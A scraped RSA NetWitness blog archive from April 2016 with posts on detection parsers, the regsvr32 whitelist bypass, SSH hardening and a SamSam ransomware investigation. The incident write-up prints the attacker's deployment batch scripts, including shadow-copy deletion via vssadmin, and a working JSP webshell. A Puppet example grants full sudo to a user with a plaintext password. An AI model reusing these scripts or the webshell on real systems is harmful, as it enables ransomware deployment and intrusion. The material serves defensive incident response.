Skip navigation
All Places > Products > RSA NetWitness Platform > Blog > 2016 > April

I had a request from a customer to parse out some messages from a mail conversation.


Basically the email contains the following headers:


Received-SPF: pass ( is whitelisted); client-ip=; helo=ECAT.waugh.local; envelope-from=david.waugh@waugh.local; x-software=spfmilter 2.001 with libspf2-1.2.10;
Received: from ECAT.waugh.local ([])
  by (8.13.8/8.13.8) with ESMTP id u3RCCOxW024832
  for <>; Wed, 27 Apr 2016 12:12:24 GMT
x-metascan-quarantine-id: e3c4973b-d836-4f37-a47d-62271c21a5cc
Received: from UKXXWAUGHDL1C ([]) by ECAT.waugh.local with ESMTP ; Wed, 27 Apr 2016 13:12:23 +0100
From: "10.5 Test" <>
To: <>
Subject: RE: This is a test through my mail system
Date: Wed, 27 Apr 2016 13:12:23 +0100
Message-ID: <0bd101d1a07e$0e479230$2ad6b690$@waugh.local>
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: Microsoft Outlook 14.0
Thread-Index: AdGget+xlnYyEWhiQrysrAxYJ7qXxgAApK1AAAAdpuAAAAfMIA==
Content-Language: en-gb
X-Virus-Scanned: clamav-milter devel-clamav-0.98-dmgxar-126-gfde6749 at infra1
X-Virus-Status: Clean


The header of interest here is the one called Received-SPF:


I created a parser based on Detecting Sinkholed Domains With The X-Factor Parser


On my Packet Decoder I created a parser called SPF.parser in /etc/netwitness/ng/parsers

containing the following:


<?xml version="1.0" encoding="utf-8"?>

<parsers xmlns:xsi="" xsi:noNamespaceSchemaLocation="parsers.xsd">

      <parser name="SPF Factor" desc="This extracts the SPF string from a Header">


                                               <token name="tXfactor" value="Received-SPF:" options="linestart" />

                                                <number name="vPosition" scope="stream" />

                                                <string name="vXfactor" scope="stream" />

                                                <meta name="meta" key="xfactor" format="Text" />




                                <match name="tXfactor">

                                                <find name="vPosition" value="&#x0d;&#x0a;" length="512">

                                                 <read name="vXfactor" length="$vPosition">

                                                  <register name="meta" value="$vXfactor"/>







Whenever the Received-SPF header was seen, then the rest of the header was put into the xfactor metakey.




If your SPF fields are from a different mail provider, then you could adjust the parser accordingly.

For example if your messages had the following header:

Authentication-Results:; spf=pass


Then the line in the parser could be changed from:

<token name="tXfactor" value="Received-SPF:" options="linestart" />


<token name="tXfactor" value="Authentication-Results:; spf=" options="linestart" />


If you wanted to put the result into a different metakey (for example result) then change

<meta name="meta" key="xfactor" format="Text" />


<meta name="meta" key="result" format="Text" />

By RSA Incident Responders Brian Baskin and Andrew Nelson


Endpoint protection is a very difficult task for Windows and endpoint agents alike. Microsoft has deployed many solutions over its various Windows versions to battle the effects of local malicious activity. Attackers continually strive to find new ways of injecting code and malware onto vulnerable systems. New exploits uncovered over time provide many avenues of remote code execution through vulnerabilities in web browsers and document viewers, giving adversaries a small window of attack to place malware onto a targeted system. Discovering such weaknesses, and covering them up, has been a continual cat and mouse game between vendors, security researchers, and advanced adversaries.


Part of this battle is due to the fact that Windows contains a great deal of seldom used or legacy functionality.  The result is many possible weaknesses cannot be known until they are discovered in the wild. Due to this, many security professionals have begun to utilize whitelisting programs in order to protect against malware executing in their environments. As a result, malware authors have often looked for instances of valid Windows programs to use as conduits for their malicious code. That’s exactly what occurred recently when security researcher Casey Smith (subTee) reviewed years of data related to the Windows Component Object Model (COM+).


“Its not well documented that regsvr32.exe can accept a url for a script.”

-- Casey Smith


A casual statement underlines a small crack deep into the heart of Windows. As Smith discovered, Windows can process COM+ Scriptlets (SCT), small XML files that contain various commands.  But what was unique to his discovery is learning that these Scriptlets, processed by regsvr32.exe, can be hosted on Internet-based sites. While registering an object into Windows requires administrative privileges, Smith learned that unregistering an object using a scriptlet can be performed by limited user accounts, even if that object doesn’t exist. While not granting any escalated privileges, the method by which this exploit runs can bypass traditional whitelists. All operations occur with standard Windows components and leave behind no trace of their execution. Smith came public and announced his findings under the code name "squiblydoo".


In keeping up with security threats, RSA’s Incident Response team immediately went to testing and evaluating the exploit. Using the proof of concept written by Smith, Windows XP, 7, and 10 were all vulnerable to the same code, even when run from a limited user account. Analysis performed in a custom sandbox showed no registry artifacts by the execution. Since Windows treats an HTTP address load as an Internet access, it uses standard Internet Explorer libraries to retrieve the file, and creates a connection with a default User-Agent. In modern versions of Windows, this is the User-Agent of Internet Explorer’s compatibility view (IE7). This also leaves behind a single IE Cached file for the downloaded script that is executed by regsvc32.exe. However, as this execution can also use HTTPS, the SSL connection can prevent the download from seen by an IDS, with the only artifact being the cached file.


Endpoint security is the critical piece in detecting this attack as it occurs. RSA’s ECAT has the unique ability to monitor execution paths on every endpoint, collecting command line arguments and tracking file system artifacts. ECAT also holds a very unique strength over the market by empowering security teams with an open and accessible backend, thus allowing for quick queries to be written on-the-fly to hunt for novel attack methods such as this.


In running the malicious command on an ECAT-monitored endpoint, ECAT’s process event tracking immediately recorded the command being executed and its follow on activity. While this test case was performed directly from cmd.exe, the same artifacts would be observable from other parent processes such as commonly exploited client software like AcroRd32.exe (Adobe Acrobat) or IExplore.exe (MS Internet Explorer).


Using ECAT’s endpoint tracking feature, attempts to spawn this COM+ attack are readily noticeable.




However, the tell-tale sign of this activity is recorded in the network connections from regsvr32.exe. This application should typically have no access to the Internet and any detection of this behavior should be immediately investigated.




With this in mind, a simple SQL query against the ECAT database, seen as a custom Instant IOC (IIOC), can give rapid results as to any system exhibiting the behavior, assigning that process an IIOC score of 1024 (blacklist).


Within ECAT simply create a new Instant IOC, shown below, and monitor any alerts that are created:


Instant IOC Query


    [na].FK_Machines as

[na].FK_MachineModulePaths as [FK_MachineModulePaths]



[dbo].[mocNetAddresses] AS [na] WITH(NOLOCK)

[dbo].[MachineModulePaths] AS [mp] WITH(NOLOCK) ON
([mp].[PK_MachineModulePaths] = [na].[FK_MachineModulePaths])

[dbo].[FileNames] AS [sfn] WITH(NOLOCK) ON ([sfn].[PK_FileNames] =



    [sfn].[FileName] LIKE 'regsvr32.exe'


Screen Shot 2016-04-22 at 2.25.29 PM.png


In addition to its unique endpoint tracking feature, RSA ECAT also has integrated support for YARA rules. This allows for quick blacklisting of known bad files based upon custom written signatures. While attacks using this method leave no trace in the registry they do leave a single copy of the downloaded script within the Internet Explorer cache. By integrating the following YARA rule, ECAT can detect as soon as this script is written to the hard drive and immediately alert security teams of its existence:


Malicious SCT Script YARA rule

rule RSA_IR_Windows_COM_bypass_script



        author="RSA IR"

        Date="22 Apr 2016"

        comment1="Detects potential scripts used by COM+ Whitelist Bypass"

        comment2="More information on bypass located at:"



        $s1 = "<scriptlet>" nocase

        $s2 = "<registration" nocase

        $s3 = "classid=" nocase

        $s4 = "[CDATA[" nocase

        $s5 = "</script>" nocase

        $s6 = "</registration>" nocase

        $s7 = "</scriptlet>" nocase



        all of ($s*)



While this discovery is an issue that will undoubtedly be mitigated by a Windows Update in the future, the vast number of potentially unpatched systems combined with an open window of easy attack make for period in which this vulnerability could be used successfully. Until this behavior is patched, security teams can only rely upon endpoint agents that can detect its subtle method of execution. As an enterprise level hunting solution, RSA ECAT empowers security teams to detect threats such as Casey Smith’s whitelist bypass as well as modern threats used by advanced adversaries to keep organizations secure.

I had a question about how to disable root login on Security Analytics for SSH.


Note before proceeding, make sure that you have IDrac access set up to your appliances. Although I have tested this script and found it working in my test environment, this does have the potential to lock you out of your appliances. Please take necessary precautions to prevent this....


You may also wish to explore STIG hardening Configure DISA STIG Hardening - RSA Security Analytics Documentation


The steps to do this are widely available and an example is

How do I disable SSH login for the root user? - Media Temple


This article will demonstrate how we implement these steps in puppet so that they will automatically be propagated through the Security Analytics Deployment.

  1. Changes to SSH Config are made in the file /etc/puppet/modules/ssh/manifests/init.pp on the SA Server.
  2. Make a backup of this file and copy it to a different directory
  3. Replace the existing /etc/puppet/modules/ssh/manifests/init.pp with the one attached. It contains the following content. Make sure that you amend the password for your emergencyroot user.


The changes will then be propagated throughout the deployment on the next Puppet run so could take up to 30 minutes to take effect.


class ssh {
  service { 'sshd':
    enable      =>  true,
    ensure      =>  running,

    exec { 'fix-ssh':
      #path        => ["/bin", "/usr/bin"],
      command     => "/etc/puppet/scripts/",
    augeas { "sshd_config_X11Forwarding":
       context => "/files/etc/ssh/sshd_config",
       changes => "set X11Forwarding no",

# Fixes to disable root login and to create an Emergency Root User

group { 'emergencyroot' :
        ensure          => 'present',
  gid             => '10018',

user { 'emergencyroot' :
        ensure          => 'present',
        home            => '/home/emergencyroot',
        gid             => '10018',
        password        => 'myverysecurepassword',
        uid             => '10018',
        shell           => '/bin/bash',

augeas { "Disable_Root_Login":
       context => "/files/etc/ssh/sshd_config",
       changes => "set PermitRootLogin no",
       notify    =>  Service['sshd']


augeas { "sudo-emergencyroot":
  context => "/files/etc/sudoers",
  changes => [
    "set spec[user = 'emergencyroot']/user emergencyroot",
    "set spec[user = 'emergencyroot']/host_group/host ALL",
    "set spec[user = 'emergencyroot']/host_group/command ALL",
    "set spec[user = 'emergencyroot']/host_group/command/runas_user ALL",
 notify    =>  Service['sshd']
 file { '/etc/ssh/sshd_config':
      ensure    =>  present,
      owner     =>  'root',
      group     =>  'root',
      mode      =>  600,
      #source    =>  'puppet:///modules/ssh/sshd_config',
      notify    =>  Service['sshd']


Years ago, when the ECAT team was all of a handful of Canadians, I saw my first ECAT demo. Look Ma, no feeds, no signatures, no scans. It will still tell you what’s wrong, before your highly paid consultant can. At that moment, I was sitting in a demo room, surrounded some by exactly such highly paid consultants, eyes wide as onions! Wait, how?!!!


With STIX still a few years away, OpenIOC seemed poised for greatness at the time.  With roughly 2500 terms to describe conditions on the ground, a standard-based design leveraging XML and LUA parsers, and with thousands of attacks already described in the language, it looked like the best direction moving forward.


The catch, however: where do you start? Some private data showed up on a public server somewhere and now you’re staring at 50,000 endpoints with no clue where the culprit might be hiding. Until that demo, it was still a matter of intuition, discrimination, trial-and-error, as well as hiring the best minds for the job.  They looked for malware, relying on their thousands of ”secret sauce” indicators, a measure of their experience. They took the weekend, scanning. But the first question in anyone’s mind was still: “Am I targeted?” – which roughly (still!) translates into: “Will my intel help me this time?” (Fingers quietly crossed...)


Which is why seeing ECAT in action seemed so implausible. It did not just scan for sophisticated malware and their variants. It actually detected new malware.


Let me let that sink in: Without a feed, without a smart analyst, without any external support, IT FOUND NEW MALWARE.


Again... how?


Besides, it did so with little delays, no enterprise-wide down time dedicated to scanning and in seconds. The demo was only 10 minutes long. When I left that meeting, I started to question the direction the entire industry was taking.


You see, searching for specific malware is not only hard – but also fruitless. It’s a Sisyphus task: after all the work done in capturing, describing and sharing your opponent technique, a simple change can bring you back to square 1. Write to this directory, not that. What ECAT did radically differently was look for canonical behaviors. You can spend hours looking for all known variants of Zeus in on your endpoint, or you can simply look for generic capabilities shared across all malware, and maybe back it up with some data analytics to decide whether that behavior, in context, is likely to be bad.


ECAT won’t name it Zeus, but beside your Zeus, it will also find any other malware that shares behaviors like Zeus. How about all Zeus variants and then some?


Instead of shepherding thousands of IOCs, it had its detection engine built right under its hood. It was not trying to detect things on the endpoint itself. Instead it bagged-and-tagged relevant information and brought it to the server for analysis. Fast, flexible and smart.


When RSA decided to purchase ECAT, I felt a little bit jealous.


Fast forward a few years, and I do find myself with the opportunity to work directly with ECAT, and shape its path forward.


What has changed since then? One big visible difference, certainly, are the Instant IOCs (IIOC), which at first sight, seems to contradict the claim of signature-less prowess. So let’s look a bit closer to this feature.


ECAT continues to look for all malware, new and old, alike. Its Instant IOCs (IIOCs) describe the behaviors it’s looking for, and they enable workflow integration with other modules: things like Alerts, Syslog and so on. But at their core, it’s essentially still the same detection engine that took everyone by surprise. We simply let you see the queries.


Managing a library of thousands of known threats is hard. New variants are issued, scanning software changes, bugs are found (but fixes are rarely propagated). The authors move on to greener pastures – “how did this old indicator work?”. The fact is, while many superheroes find new and exciting malware and might even jot down the indicator to look for it elsewhere, as an industry, we find ourselves in a great dearth of doctors to maintain that treasure throve of thousands of entries in threat intelligence. In essence, that is the “Indicator Challenge”.


With ECAT, the list is small, and it comes right out of the box. Nothing to refresh, and for a product with a few years under its belt, that set of canonical searches have withstood the test of time with remarkable aplomb.  Even as new malware is created, the mechanisms of attack are curiously constant! IIOC maintenance is part of every ECAT release.


And therein lies the magic!


Next installments: When to create new IIOCs and a side-by-side dissection showing OpenIOC / STIX and IIOC triggering on the same malware. Known malware, to give them a chance!

I had a look in my test system today and noticed that my ESA Trial Rules had been disabled.


esa Trial Rules Disabled.png


Further investigation in health and wellness showed that a particular rule was using much more memory than any others. As this is a test VM system, the virtual memory available is much less than available in a physical appliance. Here we can see that this rule is using 311 MB!


Bad ESA Rule.png


This was not what I intended for this rule, so looking at the EPL for the rule reveals the following:


module UserAgent_Alert;


@Hint('reclaim_group_aged=60 minutes,reclaim_group_freq=1')

// The stage setters - the output of these statements is for Esper to retain (internally)

CREATE WINDOW minutes) (client string);

INSERT INTO UserAgentWatchList SELECT client from Event(client IS NOT NULL AND alert_id IS NOT "Client Ignore");

// The real “alerter”. The annotation, identifies it as the one that ESA needs to watch for.



@Name('UserAgent Watchlist')

@Description('This alert will trigger on new User Agents but only 1 alert per individual IP address.')

SELECT * FROM Event(client is NOT NULL AND alert_id IS NOT "Client Ignore" ) WHERE client NOT in (SELECT client FROM UserAgentWatchList) ;


Here the issue is that I put all new clients into the UserAgentWatchList and not just new ones. This would mean that duplicate values were stored in this named window.


The correct rule is the following. In this example I only add a client to the named window UserAgentWatchListLowMem if it is not already in the named window.


@Hint('reclaim_group_aged=60 minutes,reclaim_group_freq=1')

// The stage setters - the output of these statements is for Esper to retain (internally)

CREATE WINDOW minutes) (client string);

On Event(client IS NOT NULL AND alert_id IS NOT "Client Ignore") as myevent

merge UserAgentWatchListLowMem WatchListClient

where WatchListClient.client=myevent.client

when not matched

then insert select client;


// The real “alerter”. The annotation, identifies it as the one that ESA needs to watch for.



@Name('UserAgent WatchlistLowMem')

@Description('This alert will trigger on new User Agents but only 1 alert per individual IP address.')

SELECT * FROM Event(client is NOT NULL AND alert_id IS NOT "Client Ignore" ) WHERE client NOT in (SELECT client FROM UserAgentWatchListLowMem) ;


You can check memory utilisation of your Named Windows using this article.

How do I look in the Named Windows of my ESA Rules


  Chris Ahearn

  Mark Stacey



There has been a lot of attention around ransomware attacks in the past few weeks and months.  Prior to the current outbreak, ransomware attacks were largely the result of phishing emails or unfortunate web browser redirection that would impact a single or small number of systems at a time.  Last fall we witnessed a shift in tactics and over the past few months we’ve observed a surge in large scale ransomware attacks.  The RSA Incident Response team has responded to several of these incidents at client sites.   In this post, we will discuss one of those incidents in-depth.



The client initially stated that they believed this was a mass malware infection affecting a majority of the systems on their network.  As an analyst, this was something that had not been observed in a long time.  Students of history will recall mass malware infections were once a hot topic with various worms such as Blaster, Conficker, ILoveYou, and many others.  When the information came in about a mass infection of ransomware, our team was skeptical but interested in investigating the incident.


As part of our initial call with the client they provided a sample that they believed was responsible for the outbreak.


File Name       : samsam.exe

File Size       : 218,624 bytes

MD5             : a14ea969014b1145382ffcd508d10156

SHA1            : ff6aa732320d21697024994944cf66f7c553c9cd

Fuzzy           : 3072:ZVdp01i6vcHV1LI5FLV0pZeZKfOJizjrBnNtRg+ur199J+n9fCbP:Za1i6UHVyLV0poZa1jrD099on9

Import Hash     : f34d5f2d4577ed6d9ceec516c1f5a744

Compiled Time   : Wed Jan 06 00:14:43 2016 UTC

VirusTotal      : 10/50 (1/14/2016)

PE Sections (3) : Name       Size       MD5

                  .text      216,064    7a556f246357051b2d82ea445571ddbb

                  .rsrc      1,536      d0b581056989efaa1de31a61a8f4a9ec

                  .reloc     512        06441ad348b483e2458a535949e809cf


The sample, which is commonly referred to as SamSam, was a C# .Net binary.  Compiled into the SamSam binary were two additional files del.exe and selfdel.exe.  The file del.exe, is a signed copy of the legitimate Microsoft Sysinternals Sdelete (version 1.61).  The file selfdel.exe is responsible for deleting samsam.exe using del.exe.


File Name       : del.exe

File Size       : 155,736 bytes

MD5             : e189b5ce11618bb7880e9b09d53a588f

SHA1            : 964f7144780aff59d48da184daa56b1704a86968

Import Hash     : d7caa1d72871c092dd85c4a3c5aa93bf

Compiled Time   : Sat Jan 14 23:06:53 2012 UTC

PE Sections (4) : Name       Size       MD5

  .text      116,736    a2f62fcb0a5724091981ffd869f858b4

  .rdata     25,600     b4404e299743806866081071f9194ab6

  .data      4,096      9b5b9643241417a53ebb221a1dda65f9

  .rsrc      1,536      601b278c419aa6bd7794cc85ced85721





File Name : selfdel.exe

File Size : 5,632 bytes

MD5 : 710a45e007502b8f42a27ee05dcd2fba

SHA1 : 5e70502689f6bf87eb367354268923e6a7e875c6

Import Hash : f34d5f2d4577ed6d9ceec516c1f5a744

Compiled Time : Wed Dec 02 22:24:42 2015 UTC

PE Sections (3) : Name       Size       MD5

  .text      3,072      90d77179cca96fa39f5d76f6994dc6a2

  .rsrc      1,536      e92524d72197e7683a442abe4f4581bc

  .reloc     512        caa5e20676622236360e8a65188380a6



Our analysis of the SamSam binary quickly revealed that the sample would detect local and mapped drives, enumerating the files present on the files system and targeting over 300 different file extensions (while excluding some specific directories) that would ultimately be encrypted.  The files had an extension of *.encryptedRSA.  This SamSam binary also expected, as a runtime argument, the path to a public encryption key which would be used in the attack against the system.  The image below shows part of the code of samsam looking for the public key.


The fact that this SamSam binary required arguments, indicated to RSA analysts that this file was either dropped and executed by another binary or script, potentially involving human interaction.  The analysis of the SamSam binary further documented the process by which files were encrypted and deleted, which is described below.  Once RSA analysts arrived on the client site, we quickly triaged several systems that had been compromised.  Analysts discovered that the SamSam binary was deployed throughout the network with the use of psexec and compromised domain administrator credentials.  Event logs indicated that the source of the malicious activity came from one of the organizations web servers.  Further investigation of this webserver revealed that the adversary had exploited an older vulnerability in the JBoss web application.  Using Log2Timeline, RSA analysts built system timelines from multiple systems, ultimately leading to the discovery of additional artifacts.


The image above depicts entries showing how the attacker had uploaded a zip file (, which contained their tools, to the vulnerable webserver.




The contents of the are displayed in the image above.  The list.txt file contained a list of computer names on the victim’s network, which would be used in conjunction with the other scripts to target systems. This indicates that prior reconnaissance, inside the network, was performed by the attacker. The contained all the public encryption keys the attacker was going to use, 1 per system.  Ps.exe was a copy of the legitimate SysInternals tool psexec.  The file f.bat was responsible for coping SamSam (samsam.exe) and the corresponding system encryption key to each target.  The file f.bat would also delete any volume shadow copies recovery or backup efforts.  The image below depicts the contents of f.bat.


@echo off

for /f "delims=" %%a in (list.txt) do copy samsam.exe \\%%a\C$\windows\system32 && copy %%a_PublicKey.xml \\%%a\C$\windows\system32 && vssadmin delete shadows /all /quiet




The file reg.bat, shown below, was then responsible for executing SamSam, using Psexec, with the path to the public key as an argument.



@echo off

for /f "delims=" %%a in (list.txt) do ps -s \\%%a cmd.exe /c start /b C:\windows\system32\samsam.exe %%a_PublicKey.xml




A search for any artifacts related to the above files was conducted and a hit for list.txt, was located on the previously referenced JBOSS web application server.  Some quick analysis indicated that this was an older version of JBOSS (jboss 5.0.1-GA was released in Feb 2009).



01/11/2016,18:12:28,EST5EDT,MACB,EVTX,Security,Event Logged,-,,Event ID Security/Microsoft-Windows-Security-Auditing:4634,Security/Microsoft-Windows-Security-Auditin

g ID [4634] :EventData/Data -> TargetUserSid = S-1-5-21-1844237615-1757981266-725345543-20282 TargetUserName = ABCDC2K8$ TargetDomainName = ambuscon TargetLogonId = 0x000000033336a41a L

ogonType = 3 ,2,Security.evtx,46657,Description of EventIDs can be found here:;EN-US;947226 URL:


01/11/2016,18:12:46,EST5EDT,M.C.,FILE,NTFS $MFT,$SI [M.C.] time,-,-,/jboss-5.0.1.GA/server/cm/deploy/management/invokermngrt.war/list.txt,/jboss-5.0.1.GA/server/cm/deploy/management/invokermngrt.war/list.txt,2,/jboss-5.0.1.GA/server/cm/deploy/management/invokermngrt.war/list.txt,446341, ,Log2t::input::mft,-

01/11/2016,18:12:55,EST5EDT,.A.B,FILE,NTFS $MFT,$SI [.A.B] time,-,-,/jboss-5.0.1.GA/server/cm/deploy/management/invokermngrt.war/ok.txt,/jboss-5.0.1.GA/server/cm/deploy/management/invokermngrt.war/ok.txt,2,/jboss-5.0.1.GA/server/cm/deploy/management/invokermngrt.war/ok.txt,445865, ,Log2t::input::mft,-



Further analysis of the JBOSS server directory, where list.txt was discovered, revealed numerous other artifacts including a webshell, batch files, and reGeorg (, which is a tool used for TCP tunneling through a SOCKS proxy.  The dates and times associated with these files, displayed below, confirmed what we had suspected, that this incident began earlier than the client initially thought. 




Some of the newly discovered dates of interest go back at least a month prior to the start of this incident.  The file 'css.jsp' appears to be a variant of a JSP File Manager providing the attacker with the ability to upload and download various files or tools as well as issue commands.


An example of what the css.jsp would have looked like to the attack is displayed below.  The inset box shows the password that was required to access it.  Once authenticated the attacker would be presented with the file manager interface, depicted in the next image.


The legal disclaimer for tunnel.jsp (reGeorg), is displayed below.  This tool is designed to proxy or tunnel traffic over existing and allowed ports or protocols.



One other tool uploaded by the attacker (and listed above) was the Microsoft tools csvde.exe, which is a legitimate tool used to extract Active Directory LDAP information and save it to a CSV file.  Using this tool, the attacker pulled back all the possible systems in the domain and saved them as 'com.csv'.  Once the reGeorg (tunnel.jsp) SOCKS tunnel was in place and allowing remote connectivity, the attacker then utilized RDP connections into the customer environment.  A few weeks later, the day of the encryption portion of the attack, the attacker uploaded some scripts to determine what systems (from list.txt) were currently online.  The online systems names were then output to a file, which was then used to deploy the SamSam (and related files) to the targeted systems.

Seeing the loopback IP address ( in an event log detailing RDP sessions, which is typically not allowed on Windows systems, can be an indicator of a tool like the reGeorg SOCKS proxy.  The following log decoder app rule can be used with SA for logs to detect such activity:


"device.type='winevent_nic','winevent_snare' && logon.type='10' && ip.src exists && ip.src="


There was also additional evidence of JBOSS exploitation using JexBoss, a JBOSS verify and exploitation tool.  While investigating the invokermngrt.war directory RSA analysts also noticed a jbossass.war directory as well.




The jbossass.war contained one file called jbossass.jsp.  This file was another webshell as a result of the JexBoss exploitation.



<%@ page import="java.util.*,*"%><pre><% if (request.getParameter("ppp") != null && request.getHeader("user-agent").equals("jexboss")) { Process p = Runtime.getRuntime().exec(request.getParameter("ppp")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } }%>


This webshell would provide a shell into the compromised web server.  Traffic in Security Analytics may look something like this:




Using the Security Analytics IR Content Pack, analysts could find this type of activity by investigating:

• direction = ‘inbound’

• action = ‘post’

• ir.general = ‘http_post_no_get’

• ir.general = ‘six_or_less_headers’

• ir.general = ‘post_no_get_no_referer’

• ir.general = ‘http_no_ua’



If you are running JBOSS, it is recommended that you monitor those systems closely in light of the recent wave of attacks.  Queries such as “directory = ‘/invoker/’ && filename = ‘jmxinvokerservlet’ ”can also help focus the analysis.







The client’s original remediation plan was to restore backups (from a couple of days before the attack began) of the affected systems.  This would have left the organization vulnerable to this attacker and others, potentially resulting in this same scenario occurring again at a later date.  By properly scoping and investigating the incident, it was determined that the attacker had gone undetected for over a month.  The attacker had initially targeted vulnerable applications (JBOSS) and then established a beachhead to perform some reconnaissance and upload tools.  This allowed the attacker to harvest privileged credentials.  With compromised domain administrator credentials, the attacker was able to map out the network, and then come back at a later date to complete the attack.


RSA continued researching the malware utilized in this attack, and determined that this client was not the only target in this campaign.  This research uncovered 7 additional “C2” sites and bitcoin addresses, both used to facilitate paying the ransom.   Analysis of bitcoin address transactions indicated that there were several other potential victims.  After monitoring the bitcoin transactions for several weeks, there appeared to be approximately $350,000 in bitcoins in an account (numerous transactions from different accounts were followed), before the trail went cold. This illustrates how profitable this type of attack can be for attackers and how costly it can be for organizations.


There were several lessons learned from this engagement.

  • Identifying where domain admin credentials are used, how many have access and what they are logged into is essential.  These accounts wind up being the crown jewels to an adversary.
  • Keeping web application servers, as well as any externally facing application up to date.  While this, as well as some recent variants of the attack were targeting JBOSS, other applications could also fall victim given enough time and effort spent on exploitation.
  • Maintain external and offline backups.
  • Actively monitor the network and the users.  Security Analytics and ECAT can certainly help in those respects.

On April 12, Microsoft issued a vulnerability update, to inform its customers that a vulnerability has been found in its software, which would allow a man-in-the-middle attack on software that leverages SAM and LSAD implementations  on most Microsoft Windows operating systems. This issue has important consequences, and it currently (time of this writing) tops security concerns on the Windows operating system groups. It even has its own collection of logos in the Twiterverse! So our team of engineers investigated.


Summary (from the NIST National Vulnerability Database):


The SAM and LSAD protocol implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1 , and Windows 10 Gold and 1511 do nopt properly establish an RPC channel, which allows man-in-the-middle attackers to perform protocol-downgrade attacks and impersonate users by modifying the client-server data stream, aka "windows SAM and LSAD Downgrade Vulnerability", or "BADLOCK".


RSA ECAT Engineering has researched the issue and reports that none of the RSA ECAT versions supported are affected by this vulnerability.



Microsoft has issued a patch to address this vulnerability, as documented in the Microsoft Security Bulletin MS16-047.



This issue does not affect RSA ECAT. As usual, we do recommend that all underlying infrastructure should always be kept fully patched.



Microsoft Announcement: Security Update for SAM and LSAD Remote Protocols (3148527)

NIST CVE: Vulnerability Summary for CVE-2016-0128 (Microsoft products)

Samba report: SAMR and LSA man in the middle attacks possible (CVE-2016-2118)

NIST CVE: Vulnerability Summary for CVE-2016-2118 (Samba products)



Security Analytics 10.6 has new feature that will allow you to significantly reduce your storage footprint for long term log retention on the Archiver.  Selective Log Retention allows you to create 'buckets' for your logs and specify differing retention periods for those buckets.  This will allow you to create a bucket, or collection, for your compliance logs to keep, for example, for years.  You could create a bucket for your security relevant logs to keep for six months.  You could create a bucket for copious, low value logs to keep for weeks.


Previously, if you needed to keep compliance logs for years you had to keep all logs for years, whether you needed them or not.  By aging out less valuable logs in shorter time frames if frees up space for your important logs allowing you to significantly extend the retention period for those logs without adding storage.  You still have the options for Hot, Warm, and Cold storage with individually configurable settings per collection.




The easiest way to set up Selective Log Retention is configure rules to separate out your compliance regulation logs, such as with Event Source Groups or Device IP (device.ip), and set the appropriate, required retention period.  Next, find the bulk of the low value logs by either Event Source Type (device.type) or Message ID ( and give those the lowest acceptable retention period.  Lastly, configure the retention period on the default collection, which will contain all of the remaining logs.  Further configuration refinement can optimize storage even more.


Let us know what you think and how it works for you!


More information can be found on RSA Security Analytics Documentation under Security Analytics 10.6 > Data Privacy Management > References > Data Retention Tab - Archiver or Security Analytics 10.6 > Host and Services Configuration Guides > Archiver Configuration Guide > Configure Archiver > Step 3. Configure Archiver Storage and Log Retention > Configure Log Storage Collections.

Security Analytics 10.6 has a new beta feature that will allow SA to monitor your event sources collection and alarm or notify you when an event source falls below or exceeds a rate that is normal for that event source.  The goal is to take away the need to manually determine which event sources have similar rates, group those event sources, and create monitoring policies to match, significantly reducing the burden on system administrators.  It is enabled by default to alarm but not send notifications.


It takes about 5 days to build the baseline and will then start generating alarms whenever a device deviates from that baseline.  In the case in the screenshot below, this cisco router normally generates 333 events during 6:00 PM to 7:00 PM but we haven't received any events, which is 2.657 standard deviations below the normal.  The alarm shows up on the Administration -> Event Sources -> Alarms page.



You can enable email, syslog, or SNMP notifications once you determine the alarms aren't giving you false positives.  You can also tweak the Low and High standard deviations settings in order to tune it better to your environment.  Raising the standard deviations will make it less likely for an alarm to be generated.



Let us know what you think and how it works for you!


More information can be found on RSA Security Analytics Documentation under Security Analytics 10.6 > Event Source Management > Procedures > Configure Automatic Alerting

What if you could find hosts in your network that are actively communicating with previously unknown malicious domains? Using the new behavior analytics module introduced in Security Analytics (SA) 10.6 you can. This new threat detection module is actually the first of many behavior analytics modules RSA will be delivering within SA. This new capability powerfully leverages the industry leading network, log and endpoint data collection SA is known for. Our goal is to dramatically expand the value SA delivers by automating common hunting activities and detecting threats that would be very difficult and time consuming to find manually.


With this release RSA has developed a brand new threat detection analytics solution hosted within the Event Stream Analysis (ESA) component. This new capability consumes network meta data and identifies behaviors indicative of command and control communications. This new detection service delivers prioritized alerts for analysts to investigate so they may find infected hosts much more quickly.


Customers that have SA network packet capture and the ESA component deployed can upgrade to 10.6 and follow a short list of steps to enable this new detection module. Once enabled, the module will automatically “warm up” for 24 hrs then start generating prioritized alerts. These alerts are enriched with context including domain registration information and details of the behaviors that were determined to be suspect. As analysts triage and investigate alerts the solution uses their feedback to further train the detection module, improving future accuracy.


We encourage you to upgrade to SA 10.6 and start utilizing this new capability to help defend your organization. If you are interested in seeing a short video of this feature in action click here.


Documentation on this capability may be found here.

It is a surprise to me how many people do not know all the operators available to them in the query language for investigations. Hence why it made sense to through some of the lesser known ones here.


To start, the group NOT statement which effectively does the same thing as the ! when attempting to negate an entire statement. For example can easily execute the query username !='monkey' but does not work when attempt to do

!(username='monkey'). Instead the proper syntax is ~(username='monkey') or alternatively NOT(username='monkey'). This works for all functions such as NOT(username contains 'monkey') or ~(username ends 'monkey').


Another one that is useful is <= which along with >= can be used on numerical values. For example if wanted to find all sessions with TCP destination ports less then or equal to 1024 can execute: tcp.dstport <='1024'


These can be utilized in execution of a report using the where clause as well as investigation queries.


Further details on these as well as other syntax specifics can be found in the online Security Analytics documentation:

Queries - RSA Security Analytics Documentation

William Hart

How to Filter Feeds

Posted by William Hart Employee Mar 31, 2016

Do you have a feed that is valuable but causes some false positives occasionally? Then this post is for you! The capability exists to filter out specific values from feeds without modifying the original data set. Why would you want such a thing? Well in some cases maybe the feed is generated from RSA or another entity in your organization that limits your ability to manipulate it before ingested in the Security Analytics decoders. In general the Intelligence is worth keeping the feed but there are some values that you wish could be ignored.


How do we achieve this? Simple, follow the steps below:


1) Determine the feed that is generating the errant value(s).


In Security Analytics investigation focus on the threat source meta key to determine what feed(s) generated the alert or meta for the IP, domain, or other value you want to whitelist or filter out.



In the example above at the time of this old sample data the domain was listed as suspicious by various threat sources highlighted. If it was decided that this determination was incorrect a filter file with the hostname alias could be added for each feed listed in the threat source.


